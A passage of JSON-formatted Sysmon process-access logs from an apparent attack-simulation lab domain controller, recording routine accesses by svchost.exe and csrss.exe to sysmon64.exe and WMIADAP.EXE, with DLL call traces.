C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nTargetProcessId: 4532\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02A5-5F25-0000-001050FE0500}","TargetProcessId":"4532","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 